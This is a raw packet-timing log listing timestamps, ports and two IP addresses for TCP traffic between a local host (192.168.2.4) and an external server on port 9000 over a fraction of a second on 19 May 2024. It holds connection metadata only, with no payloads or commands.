May 19, 2024 09:09:08.663279057 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.663280964 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.663294077 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.663304090 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.663321018 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.663341999 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.664031982 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.664047956 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.664061069 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.664078951 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.664088011 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.664093018 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.664113998 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.664129019 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.664134979 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.664158106 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.664201975 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.664901972 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.664916992 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.664930105 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.664947987 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.664953947 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.664963007 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.664983034 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.664983988 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.665002108 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.665009022 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.665024042 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.665046930 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.665863991 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.665879011 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.665894032 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.665911913 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.665911913 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.665920973 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.665931940 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.665942907 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.665954113 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.665954113 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.665965080 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.665973902 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.666018963 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.666800022 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.666816950 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.666832924 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.666852951 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.666853905 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.666870117 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.666872978 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.666887999 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.666906118 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.666908026 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.666940928 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.666961908 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.667793036 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.667809010 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.667820930 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.667838097 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.667849064 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.667857885 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.667862892 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.667876005 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.667890072 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.667896986 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.667912006 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.667916059 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.667933941 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.667943954 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.667972088 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.667994022 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.668735981 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.668751955 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.668764114 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.668781042 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.668790102 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.668797970 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.668808937 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.668814898 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.668834925 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.668843031 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.668853998 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.668859005 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.668878078 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.668893099 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.669693947 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.669709921 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.669724941 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.669742107 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.669755936 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.669755936 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.669780016 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.669784069 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.669799089 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.669801950 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.669820070 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.669827938 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.669843912 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.669857025 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.670447111 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.670502901 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.670651913 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.670666933 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.670679092 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.670697927 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.670701027 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.670717001 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.670751095 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.671128035 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.671143055 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.671159983 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.671169043 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.671180010 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.671185017 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.671197891 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.671200037 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.671214104 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.671231031 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.671240091 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.671262026 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.671282053 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.671905994 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.671921015 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.671935081 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.671952963 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.671956062 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.671971083 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.671977043 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.672004938 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.672024965 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.672446966 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.672461987 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.672473907 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.672492027 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.672504902 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.672511101 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.672523975 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.672549963 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.673034906 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.673049927 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.673064947 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.673075914 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.673082113 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.673101902 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.673104048 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.673120975 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.673132896 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.673152924 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.673173904 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.673588037 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.673604012 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.673619032 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.673636913 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.673645020 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.673655987 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.673659086 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.673672915 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.673691988 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.673712969 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.674078941 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.674093962 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.674144030 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.674278021 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.674293995 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.674309015 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.674323082 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.674324989 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.674344063 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.674354076 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.674365997 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.674396038 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.674828053 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.674843073 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.674856901 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.674874067 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.674875021 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.674891949 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.674895048 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.674918890 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.674943924 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.675257921 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.675318956 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.675319910 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.675362110 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.675462008 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.675477028 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.675493002 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.675512075 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.675535917 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.675549030 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.675693989 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.675856113 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.675915956 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.675944090 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.675961018 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.676013947 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.676106930 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.676130056 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.676177025 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.676342964 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.676358938 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.676386118 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.676409006 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.676490068 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.676505089 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.676544905 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.676577091 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.676620960 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.676752090 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.676799059 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.677247047 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.677262068 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.677289009 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.677310944 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.677337885 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.677428961 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.677444935 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.677481890 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.677506924 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.677731991 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.677751064 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.677787066 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.677809954 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.678168058 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.678199053 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.678246021 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.678246021 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.678345919 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.678361893 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.678400040 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.678400040 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.678450108 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.678589106 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.678760052 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.678971052 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.678987980 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.679001093 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.679030895 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.679061890 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.679151058 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.679605961 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.679879904 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.679898024 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.679915905 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.679932117 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.679968119 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.679968119 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.680094004 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.680150032 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.680206060 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.680254936 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.680394888 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.680413961 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.680452108 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.680452108 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.681648970 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.681694984 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.681716919 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.681739092 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.681751013 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.681790113 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.681818008 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.681823015 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.681837082 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.681858063 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.681874037 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.681893110 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.681919098 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.681925058 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.681943893 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.681958914 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.681967020 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.681993961 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.682012081 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.682049036 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.682395935 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.682430983 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.682455063 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.682457924 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.682480097 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.682518005 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.682538033 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.682590008 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.682637930 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.682691097 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.683128119 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.683161974 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.683197021 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.683226109 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.683228016 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.683244944 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.683274031 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.683301926 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.683348894 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.683439970 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.683473110 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.683491945 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.683537006 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.684000969 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.684068918 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.684140921 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.684180021 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.684206963 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.684232950 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.684258938 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.684313059 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.684348106 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.684365988 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.684396029 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.684848070 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.684904099 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.684931040 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.684981108 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.684994936 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.685026884 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.685048103 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.685070992 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.685126066 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.685277939 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.685919046 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.685952902 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.685982943 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.686016083 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.686054945 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.686104059 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.686157942 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.686278105 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.686359882 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.686495066 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.686551094 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.686604023 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.686682940 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.686707973 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.686762094 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.686770916 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.686804056 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.686820030 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.686856031 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.686908960 CEST	9000	49750	116.202.5.235	192.168.2.4
May 19, 2024 09:09:08.686983109 CEST	49750	9000	192.168.2.4	116.202.5.235
May 19, 2024 09:09:08.687247038 CEST	9000	49750	116.202.5.235	192.168.2.4
